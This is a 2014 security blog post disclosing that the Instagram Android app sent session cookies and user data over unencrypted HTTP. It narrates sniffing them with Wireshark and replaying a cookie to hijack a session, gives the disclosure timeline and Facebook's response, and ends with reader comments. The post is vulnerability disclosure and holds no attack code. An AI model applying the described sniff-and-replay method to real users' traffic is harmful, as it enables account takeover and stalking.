Saturday, July 26, 2014

Session Hijacking in Instagram Mobile App via MITM Attack [ 0-DAY ]




In this post, I am going to share a new critical issue that I have identified on Instagram Mobile App. During my tests on their android app, I have set-up a lab to pentest the app. Then I started using the app on my phone, and monitoring the traffic in the network using WireShark, looking for evidence for unencrypted data that goes through the network or a technique to make this data unencrypted (if it was encrypted). As soon as I logged into my account on my phone, Wireshark has captured unencrypted data that goes through HTTP. This data includes: The pictures that the victims watching, The victim's session cookies, the victim's username and ID.



I was shocked after seeing the results, it is unbelievable that Facebook, the company that is responsible for Instagram, did not insure that the data is secured and goes through HTTPS.


Then, I took the session cookies and used it in my computer, and simply “The Victim's Session Has Been Hijacked”.




I have reported this issue to Facebook, and they emailed me saying:



       The security member said:” Facebook accepts the risk of parts of Instagram communicating over HTTP not over HTTPS”.
If this unencrypted data can lead to session hijacking and stalking Instagram users, this may raise an eye-brow of suspicious.


Timeline:
Jul 24, 2014 4:35am – Reported the issue.
Jul 24, 2014 4:38am – Received a confirmation email of receiving the submission.
Jul 24, 2014 9:45pm –  Received the first response from Facebook Security.
Jul 24, 2014 9:45pm – I Asked for a disclosure.
Jul 24, 2014 11:56pm – Received the second response from Facebook Security.

Recommendation:
       Until a patch is released ( which there is no specific date for releasing a patch that has been assigned by Facebook), do not use Instagram Mobile App. Instead, use the normal website, it is generally secured and encrypted.

Final Thoughts:
       It is unbelievable that a company such as Facebook does not take the maximum measure to insure the security of their users. Right now, I believe this issue might be getting exploited in the public by surveillance and agencies.

     Follow me on Twitter @mazen160 , and check my Blog for the latest news and findings.

8 comments:

  1. Thanks for sharing, I will post it in http://www.anti-virus4u.com/ media channels

    ReplyDelete
  2. Nice work. But I think now you won't be considered for https://www.facebook.com/whitehat

    ReplyDelete
    Replies
    1. Unfortunately, it didn't qualify for Fb bounty program. But it is good that everyone knows about the reality of Facebook & Instagram now.
      Thanks,
      Mazin

      Delete
  3. i reported this vulnerability 3 months ago and i got the same reply , and instagram over web also not secured and not encrypted 100% it's not a zero-day anyway great work!

    ReplyDelete
    Replies
    1. Instagram web platform does not have known critical bugs AFAIK. I mean by a zero-day that it is still unpatched, and can be exploited by anyone.

      Thanks,
      Mazin

      Delete
  4. Acetech is a Mobile App Development India company and also popular as Software Development India. They can be an efficient business consultant for you.

    ReplyDelete
  5. I use this mobile app very often and I have never had any problems. I'm going to read more information, of course, but I like this app and never feel any discomfort.

    ReplyDelete
  6. awesome post i really like it thanks for sharing this.
    mobile

    ReplyDelete